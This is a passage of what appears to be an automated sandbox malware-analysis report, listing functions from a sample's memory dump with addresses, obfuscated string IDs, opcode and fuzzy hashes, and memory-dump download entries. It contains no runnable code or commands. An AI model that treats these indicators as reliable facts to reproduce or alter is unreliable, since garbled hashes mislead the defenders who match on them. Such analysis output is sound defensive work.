                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: +2/?$=79$BBSH$GZE^
                                          • API String ID: 0-3392023846
                                          • Opcode ID: be42e8a764808261ecc8ad8a87e2e0861b5e0d724bef01d0a4a837402fa0af2e
                                          • Instruction ID: eedc81f971a00c2e53aadd4cdced74de006454a2cd6b9e9529a1ef2a54075bb8
                                          • Opcode Fuzzy Hash: be42e8a764808261ecc8ad8a87e2e0861b5e0d724bef01d0a4a837402fa0af2e
                                          • Instruction Fuzzy Hash: 5552F172504B418FC735CF39C890766BBE1BF96314F188A6DD4EA8BB92D735A806CB50
                                          Function 0095B210 Relevance: 5.5, Strings: 4, Instructions: 464COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H{D}$TgXy$_o]a$=>?
                                          • API String ID: 0-2004217480
                                          • Opcode ID: a1d68ad26a7fec1c2052a529a026d288029e70e4522163ee1be9b6643a1f7cd8
                                          • Instruction ID: 470d695257d499e8f1df6e583b9df51ce6b7dcd6e9b69bc2b86ae0a65be947ad
                                          • Opcode Fuzzy Hash: a1d68ad26a7fec1c2052a529a026d288029e70e4522163ee1be9b6643a1f7cd8
                                          • Instruction Fuzzy Hash: 781278B1114B01CFD324CF2AD891B97BBF5FB45315F058A2DE5AA8BAA0DB74A405DF80
                                          Function 00977E20 Relevance: 5.5, Strings: 4, Instructions: 461COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: =:;8$=:;8$a{$kp
                                          • API String ID: 0-2717198472
                                          • Opcode ID: 2c3e7868dbb423809a5d67cbf3df7c4785ac56a66982f9336f6331b7e984a746
                                          • Instruction ID: fcf076c4fd46b3dc8cc882c62c2f7e5dca16bd598f189ae941355add9c3df4df
                                          • Opcode Fuzzy Hash: 2c3e7868dbb423809a5d67cbf3df7c4785ac56a66982f9336f6331b7e984a746
                                          • Instruction Fuzzy Hash: 50E1DCB656C341CFE720CF68D88576BBBE5FBC5304F04892DE5898B2A1EB749805CB42
                                          Function 0095AD00 Relevance: 5.4, Strings: 4, Instructions: 424COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @A$lPLN$svfZ$IK
                                          • API String ID: 0-1806543684
                                          • Opcode ID: 5137025f8d5bbdf8f63d9fe5898284a73eebf21aa647196d706f6c7040b1bb8b
                                          • Instruction ID: e339959874e05afd473bbcaa4a2db4e350e2a5e9fea9e6d4ed20d0f697c47323
                                          • Opcode Fuzzy Hash: 5137025f8d5bbdf8f63d9fe5898284a73eebf21aa647196d706f6c7040b1bb8b
                                          • Instruction Fuzzy Hash: F7C1287164C3848FD324CE6594A136FBBE6EBC2711F18C92CE8E54B385D7798C099B82
                                          Function 00B1E2E7 Relevance: 5.4, Strings: 3, Instructions: 1612COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: +0+8$cSz;$rU
                                          • API String ID: 0-3708242785
                                          • Opcode ID: 35f6a391a4bec5a5fa58047a66a21f5ae046a6d76167a6cc3455145eabfdd930
                                          • Instruction ID: af40f0e9044ebd03d864e95a898792c3e48a5f5568ba137a58f6527601aee48c
                                          • Opcode Fuzzy Hash: 35f6a391a4bec5a5fa58047a66a21f5ae046a6d76167a6cc3455145eabfdd930
                                          • Instruction Fuzzy Hash: 1BB226F3A0C2049FE3146E2DEC8567ABBE9EF94320F16493DEAC4D3744E63598058697
                                          Function 00B192F9 Relevance: 4.1, Strings: 2, Instructions: 1607COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: V`~e$^o|~
                                          • API String ID: 0-3152785151
                                          • Opcode ID: fcdec7f32b011804db4124e1c9638c5a45e2062e9b57c9087d948026f61f2b75
                                          • Instruction ID: ac821825588c4ca5b6a34d64ade2f0e37caa7ad0bfdff9fcee4bc50be6d4d512
                                          • Opcode Fuzzy Hash: fcdec7f32b011804db4124e1c9638c5a45e2062e9b57c9087d948026f61f2b75
                                          • Instruction Fuzzy Hash: F8B205F3A0C204AFE3046E29EC8567AFBE5EF94320F1A493DEAC4D7744E63558418697
                                          Function 00975E90 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @J$KP$VD
                                          • API String ID: 0-3841663987
                                          • Opcode ID: 7c2dcd37e06a5203d68b7eaf91e6ca0f019bc3f451755d205312b366bd61b844
                                          • Instruction ID: 5d154f7d7917c5d5bf955de7d1b12c800e172c283d10dce082cf8a00f677eff9
                                          • Opcode Fuzzy Hash: 7c2dcd37e06a5203d68b7eaf91e6ca0f019bc3f451755d205312b366bd61b844
                                          • Instruction Fuzzy Hash: CF917672704B05AFE720CF68CC817ABBBB1FB81310F14852DE5999B781C374A815DB92
                                          Function 0095C02B Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PQ$A_$IG
                                          • API String ID: 0-2179527320
                                          • Opcode ID: 76a8e764a151a31c8b6139d9fd64fa06283f218d318f9140c0e354361e21488d
                                          • Instruction ID: d8411447daab09e79e71b8a8276a54aebd7721ddde45e1673b8c65b9bec1051e
                                          • Opcode Fuzzy Hash: 76a8e764a151a31c8b6139d9fd64fa06283f218d318f9140c0e354361e21488d
                                          • Instruction Fuzzy Hash: E741BAB000C341CEC704CF26D88266BB7F5FF96759F249A0DE4C59B291E338864ACB4A
                                          Function 0098F8D0 Relevance: 3.3, Strings: 2, Instructions: 813COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: cC$jC
                                          • API String ID: 0-2055910567
                                          • Opcode ID: 3e4005db233bf1335699e4e9814fbd9ece8343bcf5e757358b18f93742d9f948
                                          • Instruction ID: 9a9c88ec23d242b5a5f2292d05ec80e9497c1ec05efe37efd97546e0bde79897
                                          • Opcode Fuzzy Hash: 3e4005db233bf1335699e4e9814fbd9ece8343bcf5e757358b18f93742d9f948
                                          • Instruction Fuzzy Hash: 1342E336F18215CFCB18CF69D8A16AEB7F2FB89310F19857EC956A7391D6349901CB80
                                          Function 0098C040 Relevance: 3.1, Strings: 2, Instructions: 624COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: f$
                                          • API String ID: 2994545307-508322865
                                          • Opcode ID: c2c4e212a2573024a09b7b8ed0e6be832723e0fae669f06581b23c1d32130b08
                                          • Instruction ID: 33397d37406da517859e1099f034876ddf3a166b8a07783abba1d062769f39fa
                                          • Opcode Fuzzy Hash: c2c4e212a2573024a09b7b8ed0e6be832723e0fae669f06581b23c1d32130b08
                                          • Instruction Fuzzy Hash: 5E12D1B060C3419FD714DF29D8D0A2BBBE5EBC5324F248A2DE595873A2D731D846CB62
                                          Function 009824E0 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                          Download Yara Rule
                                          Strings
                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00982591
                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 009825D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                          • API String ID: 0-2492670020
                                          • Opcode ID: 2d529d68b8cd04c267fa7692fcacacb19812bd326424e4561c7c690b7fbc08dc
                                          • Instruction ID: e67eafc48c7943c83199cfe70ba395d0529b2c5aff7bdd9d1613448c4eb329a4
                                          • Opcode Fuzzy Hash: 2d529d68b8cd04c267fa7692fcacacb19812bd326424e4561c7c690b7fbc08dc
                                          • Instruction Fuzzy Hash: DE816C33A586914BCB189F3C8C513A97BA65F97330F3DC3AAE8729B3D5D1298D059350
                                          Function 00955AC9 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$8
                                          • API String ID: 0-46163386
                                          • Opcode ID: 0e147c000869c5118910bbd82a142c9703e7aa5d2e987ccdc7f020e7616856d5
                                          • Instruction ID: 99103e2f97f43fae14d07c4a39ef79813122b81845158234d95cb6a705a76c4c
                                          • Opcode Fuzzy Hash: 0e147c000869c5118910bbd82a142c9703e7aa5d2e987ccdc7f020e7616856d5
                                          • Instruction Fuzzy Hash: F9A11035609780DFD320CF28D840B9EBBE1AB89304F15895DE9C897362C775E958DF52
                                          Function 0095542C Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$8
                                          • API String ID: 0-46163386
                                          • Opcode ID: 74964a348831c8d57e509ce2f8ab152ac185bed5b03228d386afd91b22add0a4
                                          • Instruction ID: 1b032f19663e2e35b1f4d195f30df47241eab204ee21d79ae50ea50497831ca7
                                          • Opcode Fuzzy Hash: 74964a348831c8d57e509ce2f8ab152ac185bed5b03228d386afd91b22add0a4
                                          • Instruction Fuzzy Hash: A5A12F3560C780DFD321CF28D84079ABBE1AB89304F1A895DE9C897362C774E958DF92
                                          Function 00A03A35 Relevance: 2.7, Strings: 2, Instructions: 203COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
